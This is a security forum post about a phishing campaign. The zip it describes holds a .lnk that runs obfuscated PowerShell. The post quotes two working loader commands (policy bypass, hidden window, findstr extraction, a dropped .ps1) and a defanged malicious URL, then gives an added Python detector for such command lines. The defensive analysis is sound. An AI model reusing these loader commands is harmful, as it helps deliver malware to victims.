
SANS ISC: Attempting to report (msg body missing) -- Powershell malware in zip with jpg - Internet Security | DShield SANS ISC InfoSec Forums


Attempting to report (msg body missing) -- Powershell malware in zip with jpg
All,
Hoping this shows up, as the previous one ended up having no message body in the post.

I have been receiving "targeted" malware emails over the last couple of months (targeted in that they have my company's address and main telephone number correctly listed in the email). Each email is an order confirmation with a hyperlink for the "order details". The link is to a zip file which each time contains a shortcut file, which is a PowerShell command, and a jpg file which for some reason is always marked as hidden.

The latest one, which I reported a week ago but is still live, has a link to:

hXXps://rkbbeauty.com/.cabinet/838IZ46044-package-updated

The jpg is named "image_20180905_190126_22.jpg" and the shortcut "838IZ46044-package-updated.lnk".

The powershell cmd has changed from when I first reported it to:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c "&{powershell -w"in hi"d"den -c {$g=findstr /s dikona $env:userprofile\*.lnk;powershell -c $g}}"

which previously was:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $no="po"wer"shel"l -win hi"dd"en -c "fi"nds"tr /s glirote3 $env:userprofile\*.lnk > $env:userprofile\Downloads\vvv"."p"s"1; & $env:userprofile\Downloads\vvv"."p"s"1"; start-process $no

What I was hoping someone would be able to shed some light on is what is "dikona" or "glirote3".

Thanks in advance
W60

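For anyone triaging command lines like the two quoted in the post, the following Python is an added example written for this page (it is not from the poster, SANS ISC or DShield). It undoes the quote-splitting trick the loader uses (`po"wer"shel"l` becomes `powershell`), flags the traits visible in both variants (execution policy bypass, hidden window, `findstr /s` over `*.lnk`, a nested `powershell`, a `.ps1` written to Downloads), and pulls out the string `findstr` searches for. The sample lines are constructed from the two commands quoted above plus a benign invocation for contrast; the rule names and the threshold of three indicators are assumptions of this example, not anything from the post.

```python
"""Normalise quote-split PowerShell command lines and flag the traits of the
LNK-based loader described in the post. Added example; assumptions are noted."""
import re

# Constructed samples: the obfuscated commands quoted in the post (new and old
# variant) and one benign PowerShell invocation for contrast.
SAMPLES = [
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c "&{powershell -w"in hi"d"den -c {$g=findstr /s dikona $env:userprofile\*.lnk;powershell -c $g}}"',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $no="po"wer"shel"l -win hi"dd"en -c "fi"nds"tr /s glirote3 $env:userprofile\*.lnk > $env:userprofile\Downloads\vvv"."p"s"1; & $env:userprofile\Downloads\vvv"."p"s"1"; start-process $no',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Command Get-ChildItem $env:userprofile\Downloads',
]

# A double quote wedged between two token characters: PowerShell concatenates
# the pieces, so "po"wer"shel"l runs as powershell while evading naive matching.
QUOTE_SPLIT = re.compile(r'[\w$.]"[\w$.]')

# Rule names are this example's own labels (assumption), matched on the
# normalised line so the obfuscation cannot hide them.
RULES = {
    'execution_policy_bypass': re.compile(r'-e(?:xecutionpolicy|p)\s+bypass', re.I),
    'hidden_window': re.compile(r'-w(?:indowstyle|in)?\s+hidden', re.I),
    # findstr /s <term> <path>\*.lnk: locate a .lnk by a marker string inside it
    'findstr_lnk_self_locate': re.compile(r'findstr\s+/s\s+\S+\s+\S*\.lnk', re.I),
    # a second powershell launched from inside the -c/-Command argument
    'nested_powershell': re.compile(r'-c(?:ommand)?\s.*\bpowershell\b', re.I),
    'script_dropped_to_downloads': re.compile(r'>\s*\S*Downloads\\\S+\.ps1', re.I),
}

# The term handed to findstr /s; in the post this is "dikona" / "glirote3".
FINDSTR_TERM = re.compile(r'findstr\s+/s\s+(\S+)\s+', re.I)


def normalize(cmdline: str) -> str:
    """Drop the double quotes PowerShell would concatenate away and collapse
    whitespace. Lossy for genuine string arguments, but enough for keyword
    matching against the rules above."""
    return re.sub(r'\s+', ' ', cmdline.replace('"', '')).strip()


def analyze(cmdline: str) -> dict:
    """Return the normalised line, the sorted list of indicator names that
    fired, and a verdict (three or more indicators is an assumed threshold)."""
    norm = normalize(cmdline)
    hits = [name for name, rx in RULES.items() if rx.search(norm)]
    if QUOTE_SPLIT.search(cmdline):  # checked on the raw line, before quotes go
        hits.append('quote_split_obfuscation')
    return {'normalized': norm, 'indicators': sorted(hits), 'suspicious': len(hits) >= 3}


def findstr_term(cmdline: str):
    """Extract the marker string findstr /s searches for, or None."""
    m = FINDSTR_TERM.search(normalize(cmdline))
    return m.group(1) if m else None


if __name__ == '__main__':
    for line in SAMPLES:
        result = analyze(line)
        print(result['suspicious'], result['indicators'], findstr_term(line))
        print('  ', result['normalized'][:120])
```

Run against a process-creation log (Sysmon event 1, 4688 with command-line auditing) rather than the three constructed samples, the same `analyze` call separates the two loader variants from ordinary PowerShell use; the findstr term is the one piece that changed between the two reported samples, so it is worth logging alongside the verdict.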
